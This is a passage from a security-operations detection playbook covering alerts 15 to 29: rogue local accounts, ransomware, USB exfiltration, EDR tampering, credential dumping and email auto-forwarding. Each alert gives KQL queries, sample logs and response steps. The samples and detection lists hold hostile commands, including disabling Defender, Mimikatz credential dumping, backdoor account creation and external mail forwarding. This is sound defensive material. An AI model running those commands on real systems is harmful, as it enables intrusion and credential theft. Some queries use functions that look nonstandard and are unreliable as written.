1. Reset the user password immediately and enforce MFA (if not enabled)
2. Isolate the machine (if the login was via RDP or physical terminal)
3. Hunt for lateral movement and recent file access or privilege escalation attempts
4. Block source IP if malicious or non-corporate
5. Review user activity post-login to check for suspicious behaviour
6. Implement lockout policies or rate-limiting on authentication services
15. Alert Name: Local Account Creation on Endpoint Outside of Provisioning Process

Alert Logic

Objective: Detect unauthorised or suspicious creation of local user accounts, which may
be used for persistence or privilege escalation.

Data Sources:

• Windows Security Logs (Event ID 4720 – user account creation)

• Sysmon (Event ID 1 – process creation of net.exe, net1.exe)
• EDR telemetry (example, CrowdStrike, Defender ATP)

Detection Logic (KQL – SecurityEvent with Exception Logic):

SecurityEvent
| where EventID == 4720
| where SubjectUserName !contains "admin" and SubjectUserName !startswith "svc"
| where TargetUserName !in ("corporate-template-user", "imaging-account")
| extend Alert = "Local user account created by unexpected user"

Alternate Logic (Sysmon – Detect Account Creation via Net Command):

Sysmon
| where EventID == 1
| where ProcessCommandLine has "net user" and ProcessCommandLine has "/add"
| where InitiatingProcessAccountName !contains "admin" and !startswith "svc"

MITRE ATT&CK Mapping

Tactic Persistence, Privilege Escalation

Techniques T1136.001 – Create Account: Local Account
T1078.001 – Valid Accounts: Local Accounts

Explanation:
Adversaries often create local user accounts to maintain access on a compromised host,
especially when domain access is lost or unnecessary.

Windows Security Log (Event ID 4720)

{
"EventID": 4720,
"TimeGenerated": "2025-04-23T14:20:42Z",
"SubjectUserName": "amir.rahim@company.com",
 "TargetUserName": "support_backup",
"AccountDomain": "WORKGROUP",
"WorkstationName": "DESKTOP-0211HR",
"Privileges": "User",
"AccountCreated": "support_backup"
}

Sysmon Log (Event ID 1 – Process Creation)

{
"EventID": 1,
"TimeGenerated": "2025-04-23T14:21:10Z",
"UserName": "amir.rahim",
"Image": "C:\\Windows\\System32\\net.exe",
"CommandLine": "net user support_backup P@ssw0rd123 /add",
"ParentImage": "C:\\Windows\\System32\\cmd.exe"
}

Threat Behavior Indicators

• Account creation from a non-IT or non-automated user

• Local-only accounts (non-domain) with privileged permissions
• Accounts named generically (example, backup, admin2, svcuser)
• Process lineage from script engines or LOLBINs

Response Actions

1. Disable or delete the suspicious local account

2. Check for follow-up actions by the account (example, service installs, logon
activity)
3. Investigate how the user gained the ability to create accounts
4. Review group memberships (especially if added to local administrators)
5. Deploy EDR rule to monitor net user /add and New-LocalUser commands
6. Harden provisioning process using LAPS, domain-only accounts and endpoint
hardening GPOs
16. Alert Name: Unusual Volume of File Encryption Activity (Potential Ransomware)

Alert Logic

Objective: Detect ransomware behaviour based on rapid encryption of a high volume of

files, especially on mapped drives or shared folders.

Data Sources:

• EDR (Microsoft Defender for Endpoint, CrowdStrike, SentinelOne)

• File system activity monitoring (Sysmon Event ID 11 – File Create)
• Network share logs
• File Integrity Monitoring (FIM)

Detection Logic (EDR/Sysmon Hybrid – KQL Style):

DeviceFileEvents
| where ActionType == "FileModified"
| where FolderPath endswith_any (".docx", ".xlsx", ".pdf", ".zip", ".jpg")
| summarise ModifiedCount = count(), DistinctFiles = dcount(FileName) by DeviceName,
InitiatingProcessAccountName, bin(Timestamp, 5m)
| where ModifiedCount > 100 and DistinctFiles > 80
| extend Alert = "High-volume file modifications indicative of ransomware"

Alternative Indicators:

• Spike in file I/O and CPU from single process (example, cmd.exe, unknown .exe)
• Files with unusual extensions (example, .encrypted, .locked, .r5a, .QeS)
• Detected rename + modify patterns in rapid succession

MITRE ATT&CK Mapping

Tactic Impact
Technique T1486 – Data Encrypted for Impact

Explanation:
This behaviour represents a ransomware attack in progress, aiming to encrypt user data
and possibly exfiltrate it before demanding ransom.

Log Sample (EDR File Event)

{
"TimeGenerated": "2025-04-23T14:45:08Z",
"DeviceName": "ACCT-PC19",
 "InitiatingProcessAccountName": "nurshahira.zainal",
"InitiatingProcessFileName": "HRbackup_agent.exe",
"ActionType": "FileModified",
"FolderPath": "C:\\Users\\nurshahira\\Documents\\",
"FileName": "salary_details_2023.pdf.encrypted",
"FileHash": "d4d80c1ff2f6ae3ad4f91b52..."
}

(Repeat across hundreds of files within minutes)

Threat Behavior Indicators

• Mass file modifications by unknown or unsigned process

• Creation of ransom note files (example, README.txt, DECRYPT_FILES.html)
• High disk I/O usage isolated to one user/process
• File extension changes across multiple types

Response Actions

1. Immediately isolate the infected endpoint from network

2. Terminate the malicious process using EDR kill action
3. Check for lateral movement (example, shared drives, mapped folders)
4. Search for ransom notes and dropper files
5. Begin recovery using backups (offline & integrity verified)
6. Notify legal and compliance teams (especially for exfiltrated data)
17. Alert Name: Endpoint DLP Alert on Sensitive File Movement to USB Device

Alert Logic

Objective: Detect potential data exfiltration by flagging attempts to copy sensitive or

classified files to external USB storage devices.

Data Sources:

• Endpoint DLP solutions (Microsoft Purview, Symantec DLP, Forcepoint DLP)

• EDR with USB activity monitoring
• Windows Event Logs (Event ID 4663 – object access, with auditing enabled)

Detection Logic (KQL – Microsoft Defender for Endpoint + DLP Integration):

DeviceEvents
| where ActionType == "FileCopyToRemovableMedia"
| where FileName endswith_any (".docx", ".xlsx", ".pdf", ".csv", ".zip")
| where FileSensitivityLabel in~ ("Confidential", "Restricted", "Sensitive")
| summarise FileCount = count(), UniqueFiles = dcount(FileName) by DeviceName,
ReportedUser, RemovableMediaName, bin(Timestamp, 1h)
| where FileCount > 5
| extend Alert = "Sensitive files copied to USB device"

Alternative Indicators:

• USB drive mounted followed by rapid access to sensitive file types

• Absence of encryption or device control policies
• File copy operations shortly before employee resignation or suspicious behaviour

MITRE ATT&CK Mapping

Tactic Exfiltration
Technique T1052.001 – Exfiltration over Physical Medium: Removable Media

Explanation:
USB drives are frequently used by insiders or malware to steal data, bypassing network
controls entirely.

Log Entry (Microsoft Purview DLP Alert)

{
"TimeGenerated": "2025-04-23T15:10:00Z",
"ReportedUser": "hasif.azman@company.com",
 "DeviceName": "HR-LAPTOP02",
"RemovableMediaName": "KINGSTON USB 3.0",
"ActionType": "FileCopyToRemovableMedia",
"FileName": "2024_salary_structure.xlsx",
"FileSensitivityLabel": "Confidential",
"FileSise": "834 KB"
}

Threat Behavior Indicators

• DLP alert involving multiple confidential files copied to a removable device

• USB activity from non-corporate branded devices (example, personal USBs)
• Event occurs outside business hours or from unmanaged endpoints
• File types linked to HR, finance, legal or intellectual property

Response Actions

1. Block the user’s access and eject USB immediately if real-time

2. Retrieve and analyse the copied files to assess sensitivity and impact
3. Interview the user and check employment status (resignation, internal issues)
4. Review full DLP policy coverage (should log, block or encrypt when USB used)
5. Correlate with previous access logs or DLP alerts to see if it’s part of a pattern
6. Implement stricter USB controls (example, allow list, encryption enforcement,
monitoring)
18. Alert Name: VPN Login from Blacklisted IP Addresses

Alert Logic

Objective: Detect when a user successfully authenticates to the corporate VPN from an IP
address known to be malicious, part of anonymisation services (example, Tor, proxy/VPN
providers) or listed on threat intelligence feeds.

Data Sources:

• VPN logs (example, Cisco ASA, Fortinet, Palo Alto GlobalProtect, OpenVPN)
• Identity provider logs (Azure AD, Okta, etc.)
• Threat Intelligence feeds (example, AlienVault OTX, AbuseIPDB, BrightCloud)

Detection Logic (KQL – VPN Logs + TI Enrichment):

VPNAuthenticationLogs
| where EventResult == "Success"
| join kind=inner (
ThreatIntelIP
| project TI_IP = IpAddress
) on $left.SourceIP == $right.TI_IP
| summarise LoginsFromTI = count() by User, SourceIP, Country, ASN, TimeGenerated
| extend Alert = "Successful VPN login from blacklisted IP"

Logic Summary:

• Filters successful logins

• Cross-references login source IP against threat intelligence feeds
• Can be enhanced with country-based geofencing or ASN categorisation

MITRE ATT&CK Mapping

Tactic Initial Access

Technique T1078 – Valid Accounts
T1566 – Phishing (initial credential theft leading to VPN abuse)

Explanation:
Attackers frequently exploit stolen credentials via VPN access, especially when no geo-
blocking or MFA enforcement is in place. Using known bad IPs can indicate botnet usage,
compromised proxy servers or obfuscation.

VPN Log Entry

{
"TimeGenerated": "2025-04-23T15:28:17Z",
"User": "zahir.abidin@company.com",
"SourceIP": "185.220.101.44",
"VPNGateway": "vpn.corp.company.com",
"Location": "Netherlands",
"Provider": "Tor Exit Node",
"Result": "Success"
}

Threat Intelligence Match

{
"TI_IP": "185.220.101.44",
"Reputation": "Tor Exit Node, Proxy Service",
"ConfidenceScore": 90,
"Category": "Anonymiser, Suspicious Access Point",
"LastSeen": "2025-04-22T22:01:00Z"
}

Threat Behavior Indicators

• Login from anonymised services (example, Tor, NordVPN, ExpressVPN)

• No prior login history from that IP or region
• IP is part of a known threat actor infrastructure
• Login followed by unusual actions (example, mass downloads, privilege escalation)

Response Actions

1. Revoke VPN session/token immediately

2. Force password reset for the affected user
3. Correlate login with user behaviour before and after VPN access
4. Add the blacklisted IP to a denylist at VPN/firewall
5. Enforce IP allowlist and geo-fencing for VPN access
6. Ensure MFA is enforced on all VPN connections
19. Alert Name: Disabled Antivirus or EDR Agent Service on Endpoint

Alert Logic

Objective: Detect when security-critical services like antivirus, EDR or XDR agents are
disabled, either manually or by malware, which is a common precursor to further
exploitation or evasion.

Data Sources:

• Windows Event Logs (Event ID 7036 – Service state change)

• Sysmon (Event ID 6 – Driver loaded, Event ID 1 – Process creation)
• EDR/XDR alerts (example, Defender for Endpoint, CrowdStrike, SentinelOne)

Detection Logic (KQL – Event Logs + Process Correlation):

Event
| where EventID == 7036 and EventData contains "stopped"
| where ServiceName has_any ("WinDefend", "Sense", "CrowdStrike", "SentinelAgent",
"CarbonBlack")
| extend Alert = "Security service disabled on endpoint"

Alternate (EDR Detection for Service Tampering):

DeviceProcessEvents
| where FileName == "sc.exe" or FileName == "powershell.exe"
| where ProcessCommandLine has_any ("stop-service", "sc stop", "Set-MpPreference",
"DisableRealtimeMonitoring")

MITRE ATT&CK Mapping

Tactic Defense Evasion

Techniques T1562.001 – Disable or Modify Tools: Security Software
T1059.001 – PowerShell abuse for tampering

Explanation:
Disabling security tools is a common step in many malware chains to avoid detection
before executing payloads or moving laterally.

Log (Windows System Event – 7036)

{
"EventID": 7036,
"TimeGenerated": "2025-04-23T15:42:29Z",
 "ComputerName": "ENG-LAPTOP09",
"ServiceName": "WinDefend",
"ServiceStatus": "stopped",
"TriggeredBy": "user32.dll via powershell.exe"
}

EDR Log (Process Tampering)

{
"TimeGenerated": "2025-04-23T15:42:35Z",
"DeviceName": "ENG-LAPTOP09",
"InitiatingProcessAccountName": "hamzah.yusri@company.com",
"FileName": "powershell.exe",
"ProcessCommandLine": "powershell -Command \"Set-MpPreference -
DisableRealtimeMonitoring $true\"",
"ParentProcess": "cmd.exe"
}

Threat Behavior Indicators

• Service stop events targeting Defender, CrowdStrike, SentinelOne, etc.

• Admin utilities (example, sc.exe, PowerShell) used to alter protection states
• Tampering observed outside of scheduled patching or IT change window
• EDR agent uninstall or sensor heartbeat lost

Response Actions

1. Immediately re-enable the security service or reinstall the EDR agent

2. Investigate the parent process responsible for service shutdown
3. Isolate the endpoint if compromise is confirmed
4. Correlate with process execution history and check for follow-up activity
5. Deploy prevention rules to block tampering commands
6. Ensure tamper protection is enabled across all agents
20. Alert Name: Mass File Deletion Detected on Shared Folder

Alert Logic

Objective: Detect mass deletion of files in a network share or shared directory a behaviour
commonly linked to ransomware, sabotage or rogue insiders.

Data Sources:

• File system auditing (Windows Event ID 4660 – Object Deleted)

• File Integrity Monitoring (FIM)
• EDR (with file operation telemetry)
• NAS/SAN appliance logs (example, NetApp, QNAP, Synology)

Detection Logic (KQL – File Delete Volume Monitoring):

DeviceFileEvents
| where ActionType == "FileDeleted"
| where FolderPath has "\\NetworkShare\\" or FolderPath has "\\\\"
| summarise DeleteCount = count(), UniqueFiles = dcount(FileName) by DeviceName,
InitiatingProcessAccountName, bin(Timestamp, 5m)
| where DeleteCount > 100 and UniqueFiles > 80
| extend Alert = "Mass file deletion detected on shared folder"

Alternative Logic (Windows Event ID 4660 + Share Location Filtering):

SecurityEvent
| where EventID == 4660
| where ObjectName contains "\\Shared\\"
| summarise DeletedFiles = count() by AccountName, Computer, bin(TimeGenerated, 5m)
| where DeletedFiles > 100

MITRE ATT&CK Mapping

Tactic Impact
Technique T1485 – Data Destruction

Explanation:
Threat actors and malicious insiders may delete business-critical files to disrupt
operations, destroy logs or as part of ransomware finalisation.

File Delete Log (EDR or FIM Style)

{
 "TimeGenerated": "2025-04-23T15:55:12Z",
"DeviceName": "SALES-LAPTOP18",
"InitiatingProcessAccountName": "syed.hafiz@company.com",
"ActionType": "FileDeleted",
"FolderPath": "\\\\fileserver01\\Shared\\2023Projects\\",
"FileName": "contract_summary_q3.pdf",
"ProcessName": "cmd.exe"
}

(Occurs repeatedly with different filenames in short span)

Threat Behavior Indicators

• 100 files deleted within 5 minutes from shared drives

• Deletion initiated via cmd.exe, PowerShell or script-based processes
• User account not typically accessing the folder (privilege misuse or insider risk)
• Folders targeted contain sensitive business, legal or operational files

Response Actions

1. Immediately isolate the host and revoke user access

2. Initiate file recovery from latest backups or shadow copies
3. Investigate user intent (negligence, resignation, insider threat, malware)
4. Check for corresponding file modification/encryption before deletion
5. Deploy alerting for bulk deletes and FIM policy enforcement
6. Enable versioning or recycle bin features on network shares where possible
21. Alert Name: New Domain Admin Group Member Added

Alert Logic

Objective: Detect unauthorised privilege escalation through addition of a user to the highly
sensitive Domain Admins group often signalling lateral movement or intent to maintain full
domain control.

Data Sources:

• Windows Security Logs (Event ID 4728 – User added to a global security-enabled

group)
• Azure AD logs (for hybrid/Cloud Identity environments)
• Active Directory change audit tools (example, ADAudit, Quest Change Auditor)

Detection Logic (KQL – Windows Security Event Example):

SecurityEvent
| where EventID == 4728
| where TargetUserName != "" and GroupName =~ "Domain Admins"
| where SubjectUserName !contains "admin" and SubjectUserName !startswith "svc"
| extend Alert = "User added to Domain Admin group"

Optional Enhancements:

• Filter based on time-of-day (example, after-hours activity)

• Cross-reference with expected change management activity
• Alert only if the actor is not part of IT operations

MITRE ATT&CK Mapping

Tactic Privilege Escalation, Persistence

Techniques T1098 – Account Manipulation
T1078.002 – Valid Accounts: Domain Accounts

Explanation:
Adversaries who gain a foothold in a domain will often attempt to escalate privileges by
modifying group memberships especially targeting Domain Admins, Enterprise Admins or
custom high-privilege groups.

Log Entry (Windows Security Event – 4728)

{
"EventID": 4728,
 "TimeGenerated": "2025-04-23T16:10:47Z",
"SubjectUserName": "nurhidayah.rahim",
"TargetUserName": "helpdesk_temp",
"GroupName": "Domain Admins",
"Domain": "CORP",
"Computer": "DC01.CORP.local"
}

Threat Behavior Indicators

• New user added to privileged group from a low-privilege account

• Change occurs during off-hours or with no associated ticket
• Rapid follow-up actions like login to DC, GPO modification or lateral movement
• New admin account appears in event logs or EDR tools with unexpected activity

Response Actions

1. Immediately remove the user from the Domain Admins group

2. Reset credentials for the user and review their recent activity
3. Check whether the change was initiated via PowerShell, net.exe or ADUC
4. Review DC logs and perform threat hunting across domain controllers
5. Implement Group Membership change alerting via SIEM and AD auditing
6. Restrict account modification rights using tiered admin model (Tier 0, 1, 2)
22. Alert Name: Login from Newly Registered Domain Email Address

Alert Logic

Objective: Detect login attempts successful or failed using email addresses from recently
registered domains, which are commonly used in phishing, BEC (Business Email
Compromise) and spoofing attacks.

Data Sources:

• Identity provider logs (Azure AD, Okta, Google Workspace)

• Email security platforms (Proofpoint, Mimecast, Microsoft Defender for Office 365)
• Domain WHOIS & threat intelligence feeds (example, DomainTools, RiskIQ,
VirusTotal)

Detection Logic (KQL – Identity + WHOIS TI):

SigninLogs
| extend Domain = tostring(split(UserPrincipalName, "@")[1])
| join kind=inner (
DomainReputationFeed
| where RegistrationAgeDays < 30
| project Domain
) on Domain
| extend Alert = "Login attempt from newly registered domain"

Logic Summary:

• Extracts domain from login email

• Compares against threat intel / WHOIS data showing domain registration within the
past 30 days
• Optional: filter only if login failed or if it's an external identity not whitelisted

MITRE ATT&CK Mapping

Tactic Initial Access

Techniques T1566 – Phishing
T1585 – Establish Accounts (Spoofed External Identity)

Explanation:
Threat actors often register lookalike or fake domains (example, micros0ft-support.com) to
perform targeted attacks especially against SSO portals, B2B platforms and federated
login flows.
Sign-in Log Entry

{
"TimeGenerated": "2025-04-23T16:25:30Z",
"UserPrincipalName": "muhammad.amin@corp-helpdesk-support[.]com",
"Result": "Failure",
"Location": "Singapore",
"ClientAppUsed": "Browser",
"IPAddress": "104.248.23.88",
"Device": "Unknown",
"DomainRegistrationDate": "2025-04-18",
"RegistrationAgeDays": 5
}

Threat Behavior Indicators

• Login attempts using suspicious domains not previously seen in your environment
• Domains registered in the last 7–30 days (freshly created)
• Account names that impersonate real vendors, employees or departments
• Repeated failed attempts from different IPs (spray-and-pray phishing)

Response Actions

1. Block the domain at identity provider, email gateway and firewall

2. Search all email logs for messages from or to the domain
3. Enable conditional access policies restricting unknown domains or guest users
4. Implement domain reputation checks in login and guest invitation flows
5. Educate users about lookalike domain spoofing and phishing indicators
23. Alert Name: Brute-force Attack Detected on Web-facing Application Login

Alert Logic

Objective: Detect repeated failed login attempts to publicly accessible applications

(example, webmail, VPN, CRM, portals) a common tactic used to gain unauthorised
access via credential stuffing or password guessing.

Data Sources:

• Web server logs (IIS, Apache, Nginx)

• WAF logs (example, Cloudflare, AWS WAF, Azure WAF)
• Identity Provider logs (example, Okta, Azure AD)
• SIEM log ingestion from login endpoints

Detection Logic (KQL – Web App Logs or WAF + Identity):

WebAppAuthLogs
| where Result == "Failed"
| summarise FailCount = count(), UniqueUsers = dcount(UserName) by SourceIP,
bin(Timestamp, 5m)
| where FailCount > 30 or UniqueUsers > 10
| extend Alert = "Possible brute-force or credential stuffing attack from SourceIP"

Alternate Detection (WAF):

WAFLogs
| where RuleMatched contains "Login Brute Force"
| summarise Attempts = count() by SourceIP, TargetURL, bin(TimeGenerated, 5m)

MITRE ATT&CK Mapping

Tactic Credential Access

Technique T1110.003 – Brute Force: Credential Stuffing
T1190 – Exploit Public-Facing Application (if paired with known vuln scan)

Explanation:
Attackers often test credential reuse across multiple web apps using bots and leaked
usernames/emails from previous breaches.

Web Auth Log (JSON)

{
"TimeGenerated": "2025-04-23T16:40:01Z",
 "Application": "Webmail Portal",
"SourceIP": "203.217.55.188",
"UserName": "zuraida.hassan@company.com",
"LoginResult": "Failed",
"UserAgent": "Mozilla/5.0 (Linux; Android 9)",
"TargetURL": "/login",
"FailCountFromIP": 52,
"LoginAttemptsWithin5min": 37
}

Threat Behavior Indicators

• 30 failed logins from the same IP within 5 minutes

• Multiple usernames targeted from the same IP (spray)
• Odd user-agents (example, bots, emulators, curl or python-requests)
• Source IP from anonymisation services or foreign geolocations

Response Actions

1. Temporarily block or rate-limit the source IP via WAF or firewall

2. Enable CAPTCHA or MFA enforcement on targeted login endpoints
3. Investigate whether any accounts were successfully accessed
4. Notify targeted users to reset passwords and review MFA configuration
5. Implement lockout policies or throttling on the authentication service
6. Enable anomaly-based login alerts in the IdP or SIEM
24. Alert Name: Unusual Login Time Detected Based on User Behaviour Baseline

Alert Logic

Objective: Detect login activity that deviates from a user’s normal login patterns especially
during unusual hours (example, late night or weekends), which can indicate compromised
credentials or insider threat.

Data Sources:

• Identity provider logs (Azure AD, Okta, G Suite)

• SIEM UEBA modules (User and Entity Behaviour Analytics)
• VPN / SSO / authentication gateway logs

Detection Logic (KQL – SigninLogs + Behaviour Baseline):

let UserLoginHours = SigninLogs

| where ResultType == 0
| summarise TypicalHour = percentile_hour(TimeGenerated, 95) by UserPrincipalName;

SigninLogs
| where ResultType == 0
| extend LoginHour = datetime_part("hour", TimeGenerated)
| join kind=inner (UserLoginHours) on UserPrincipalName
| where abs(LoginHour - TypicalHour) > 5
| extend Alert = "Login time anomaly: outside typical working hours"

Alternate Approach (Static Time Range):

SigninLogs
| where ResultType == 0
| where datetime_part("hour", TimeGenerated) < 6 or datetime_part("hour",
TimeGenerated) > 22
| extend Alert = "User login detected outside normal working hours"

MITRE ATT&CK Mapping

Tactic Defense Evasion

Technique T1078 – Valid Accounts
T1036 – Masquerading (via timing)

Explanation:
Attackers often conduct activities during low-monitoring hours to avoid detection.
Anomalous logins outside business hours can reveal compromised or misused
credentials.

Login Log Entry

{
"TimeGenerated": "2025-04-23T03:21:15Z",
"UserPrincipalName": "farid.azwan@company.com",
"ResultType": 0,
"IPAddress": "41.67.128.93",
"Location": "South Africa",
"ClientAppUsed": "Browser",
"LoginHour": 3,
"TypicalLoginHour": 9
}

Threat Behavior Indicators

• Login time deviates significantly from baseline (example, >5-hour difference)

• Occurs outside business hours or on weekends/holidays
• Unusual geolocation or IP associated with the login
• Followed by abnormal activity (example, mass file access, group membership
changes)

Response Actions

1. Validate with user whether they logged in intentionally

2. Check activity following login for indicators of malicious actions
3. Correlate with known IP, device and user risk scores
4. Force password reset and revalidate MFA for the account
5. Create behaviour baselines and automate anomaly detection in SIEM
6. Enable alerts for future logins during abnormal hours
25. Alert Name: Uncommon Protocol Usage Detected Over Standard Ports

Alert Logic

Objective: Detect when protocols or traffic types deviate from expected usage on well-
known ports a tactic often used by attackers to bypass network security controls or hide
malicious traffic.

Data Sources:

• Network traffic logs (NetFlow, Zeek, Suricata, firewall logs)

• IDS/IPS alerts
• Deep packet inspection (DPI) sensors

Detection Logic (KQL – Zeek or NetFlow Style Analysis):

NetworkTraffic
| where DestinationPort == 80 or DestinationPort == 443
| where Protocol not in ("HTTP", "HTTPS")
| summarise SessionCount = count() by SourceIP, DestinationIP, DestinationPort,
Protocol, bin(Timestamp, 5m)
| where SessionCount > 10
| extend Alert = "Unusual protocol detected on standard web port"

Examples of Abuse:

• SSH over port 443

• FTP or SMB tunneled over port 80
• Remote administration tools using disguised ports
• Custom malware C2 using HTTP ports for binary or encrypted data

MITRE ATT&CK Mapping

Tactic Command and Control

Technique T1071.001 – Application Layer Protocol: Web Traffic
T1095 – Non-Application Layer Protocol

Explanation:
Malicious actors frequently mask their traffic under common ports like 443 (HTTPS) to
evade basic firewall rules and outbound restrictions.

Network Log Entry

{
 "TimeGenerated": "2025-04-23T04:10:32Z",
"SourceIP": "10.10.22.34",
"DestinationIP": "192.0.2.18",
"DestinationPort": 443,
"DetectedProtocol": "SSH",
"BytesSent": 52340,
"BytesReceived": 17430,
"SessionDuration": "00:02:11"
}

Threat Behavior Indicators

• Port 80/443 traffic that does not match web protocol patterns
• Long-lived sessions over ports typically used for short HTTP bursts
• IDS/IPS alert for protocol mismatch or custom tunneling
• No SNI or invalid TLS handshakes during SSL negotiation

Response Actions

1. Inspect full packet capture or reconstruct session to confirm misuse

2. Block the specific IP or fingerprinted traffic if confirmed malicious
3. Deploy DPI rules or SSL inspection for deeper traffic classification
4. Review proxy/firewall rules to enforce application-layer enforcement
5. Hunt for lateral movement attempts using disguised ports
6. Educate teams on expected protocol-port combinations in the environment
26. Alert Name: Remote PowerShell Execution from Unauthorised Host

Alert Logic

Objective: Detect PowerShell remoting (example, using Invoke-Command, Enter-

PSSession or WinRM) initiated from endpoints that are not allowed to perform
administrative tasks often signalling lateral movement or attacker hands-on-keyboard
actions.

Data Sources:

• Sysmon (Event ID 1 – process creation)

• Windows Event Logs (Event ID 4104 – PowerShell ScriptBlock)
• WinRM service logs
• EDR telemetry

Detection Logic (KQL – Sysmon + EDR):

DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has_any ("Invoke-Command", "Enter-PSSession", "New-
PSSession")
| where DeviceName !in ("IT-ADMIN-01", "MGMT-JUMPHOST")
| extend Alert = "Unauthorised remote PowerShell execution"

Alternate (Windows PowerShell Logs – Event ID 4104):

SecurityEvent
| where EventID == 4104
| where ScriptBlockText has_any ("New-PSSession", "Invoke-Command")
| where AccountName !startswith "svc" and AccountName !contains "admin"

MITRE ATT&CK Mapping

Tactic Lateral Movement

Techniques T1021.006 – Remote Services: PowerShell Remoting
T1059.001 – Command and Scripting Interpreter: PowerShell

Explanation:
Adversaries often use PowerShell remoting (via WinRM) after initial access to execute
commands on remote hosts with stolen credentials.

PowerShell Log Entry (Sysmon + ScriptBlock)

{
"TimeGenerated": "2025-04-23T04:23:47Z",
"DeviceName": "FINANCE-PC22",
"UserName": "roslan.azhar@company.com",
"FileName": "powershell.exe",
"CommandLine": "powershell.exe -ExecutionPolicy Bypass -Command Invoke-Command
-ComputerName HR-PRINT01 -ScriptBlock { Get-Process }",
"RemoteHost": "HR-PRINT01"
}

Threat Behavior Indicators

• PowerShell remoting invoked from user workstations instead of jump servers

• No prior history of the user using WinRM or PowerShell remote admin tools
• Use of -ExecutionPolicy Bypass and -EncodedCommand in command line
• Correlated logon events from same source followed by remote execution

Response Actions

1. Validate whether the host/user is permitted for remote PowerShell

2. Inspect target host for follow-up actions (example, persistence, credential
dumping)
3. Restrict PowerShell remoting via GPO or role-based access control
4. Deploy script block logging and monitor for encoded/invoked command abuse
5. Alert on non-jump host initiating WinRM connections
6. Quarantine host if lateral movement confirmed and review login sources
27. Alert Name: Mimikatz Tool Execution or Similar Credential Dumping Tool Detected

Alert Logic

Objective: Detect attempts to extract credentials from memory using tools like Mimikatz,
LaZagne, SafetyKatz or other custom credential dumping tools a high-fidelity indicator of
adversary post-exploitation activity.

Data Sources:

• EDR (Microsoft Defender for Endpoint, CrowdStrike, SentinelOne)

• Sysmon (Event ID 1 – process creation, Event ID 10 – WMI activity)
• Memory scanning / behavioural detection engines

Detection Logic (KQL – Process Monitoring & Signature Matching):

DeviceProcessEvents
| where FileName has_any ("mimikatz.exe", "mimi.exe", "Invoke-Mimikatz", "LaZagne.exe",
"DumpCreds.exe")
or ProcessCommandLine has_any ("sekurlsa::logonpasswords", "privilege::debug",
"token::elevate")
| extend Alert = "Credential dumping tool execution detected"

Alternate (Behaviour-Based – Without Exact Filename):

DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "Invoke-Mimikatz"

EDR Tools: May detect this by signature (hash), behaviour (suspicious memory reads) or
through AMSI integration in PowerShell environments.

MITRE ATT&CK Mapping

Tactic Credential Access

Techniques T1003.001 – OS Credential Dumping: LSASS Memory
T1003.004 – DCSync, T1555.003 – Credentials from Password Stores

Explanation:
Credential dumping is a post-exploitation step used to pivot across systems or maintain
persistence through password reuse or golden ticket attacks.

EDR Log (Process Execution)

{
"TimeGenerated": "2025-04-23T04:37:25Z",
"DeviceName": "MGMT-SERVER01",
"UserName": "muhammad.fairuz@company.com",
"FileName": "mimikatz.exe",
"ProcessCommandLine": "mimikatz.exe privilege::debug sekurlsa::logonpasswords",
"MD5": "fd6c1e6ae5588e9873d108e8ffdf9b42",
"SHA256": "c1219b0b3e94ce5482a6e9bdbd8b7e7ab33..."
}

Threat Behavior Indicators

• Known credential dumping tools executed (by name, hash, behaviour)

• Use of privilege::debug, sekurlsa::logonpasswords or wdigest::credentials
• LSASS access attempts (memory handle open with full permissions)
• Rare or first-time execution on sensitive systems (example, domain controllers)

Response Actions

1. Immediately isolate the host from the network

2. Terminate the offending process and collect a memory dump for forensic analysis
3. Investigate LSASS access patterns and any subsequent credential reuse
4. Reset credentials for impacted users or service accounts
5. Block known tool hashes and behaviour patterns via EDR
6. Enable Windows security settings (example, LSA protection, Credential Guard)
28. Alert Name: New Inbox Rule Created to Auto-Forward Emails Externally

Alert Logic

Objective: Detect suspicious inbox rule creation configured to auto-forward emails to

external addresses, a common tactic in business email compromise (BEC) and espionage
operations.

Data Sources:

• Microsoft 365 Unified Audit Logs

• Exchange Online (Mailbox audit logs)
• Google Workspace admin logs (Gmail rule changes)
• Email security platforms (example, Proofpoint, Mimecast)

Detection Logic (KQL – M365 Audit Logs):

AuditLogs
| where OperationName == "New-InboxRule"
| where Parameters has_any ("ForwardTo", "RedirectTo")
| where Parameters contains "@"
| where Parameters matches regex "(@(?!company\\.com))"
| extend Alert = "External auto-forwarding rule created"

Alternate (Exchange MailboxAuditLogs):

OfficeActivity
| where Operation == "Set-Mailbox" and Parameters contains "ForwardingSmtpAddress"
| where Parameters contains "@"
| where Parameters !contains "company.com"

MITRE ATT&CK Mapping

Tactic Collection, Exfiltration

Techniques T1114.003 – Email Collection via Mail Forwarding Rule
T1020 – Automated Exfiltration

Explanation:
Attackers use inbox rules to silently forward sensitive conversations (example, finance,
HR, legal) to external mailboxes. This often follows successful phishing or credential theft.

Audit Log Entry (Microsoft 365)

{
 "TimeGenerated": "2025-04-23T04:50:49Z",
"UserPrincipalName": "hasniza.farhana@company.com",
"OperationName": "New-InboxRule",
"RuleName": "ForwardAll",
"ForwardTo": "externalreport@attacker-domain[.]com",
"Conditions": "Apply to all messages",
"ClientIP": "192.0.2.55",
"Application": "Outlook Web Access"
}

Threat Behavior Indicators

• Inbox rules that forward all or specific messages externally

• Rule created via OWA or legacy protocols (less visibility)
• No user awareness of rule creation (i.e., not admin or legitimate automation)
• Unusual external domains or free email services (example, Gmail, ProtonMail,
Mail.ru)

Response Actions

1. Immediately remove the malicious inbox rule

2. Notify and verify with the affected user
3. Search email history for signs of impersonation or credential reuse
4. Force password reset and MFA re-registration
5. Enable rule creation alerting in M365 Security & Compliance Center
6. Restrict auto-forwarding to only approved external domains (or block entirely)
29. Alert Name: Suspicious VPN Login Not Followed by Normal Application Access

Alert Logic

Objective: Detect potential credential abuse or reconnaissance activity where a VPN login
occurs but is not followed by expected application usage, indicating possible account
compromise, testing or staging activity.

Data Sources:

• VPN logs (example, Cisco ASA, Palo Alto GlobalProtect, Fortinet, OpenVPN)
• Web proxy logs / NetFlow / SIEM
• Application access logs (example, SAP, ERP, Salesforce, M365)

Detection Logic (KQL – VPN Log with Missing App Access):

let VPNLogins = VPNAuthenticationLogs

| where EventResult == "Success"
| project User, SourceIP, LoginTime = TimeGenerated;

let AppAccess = AppUsageLogs

| summarise FirstAccess = min(TimeGenerated) by User
| where TimeGenerated > ago(1h);

VPNLogins
| join kind=leftanti (AppAccess) on User
| where LoginTime > ago(1h)
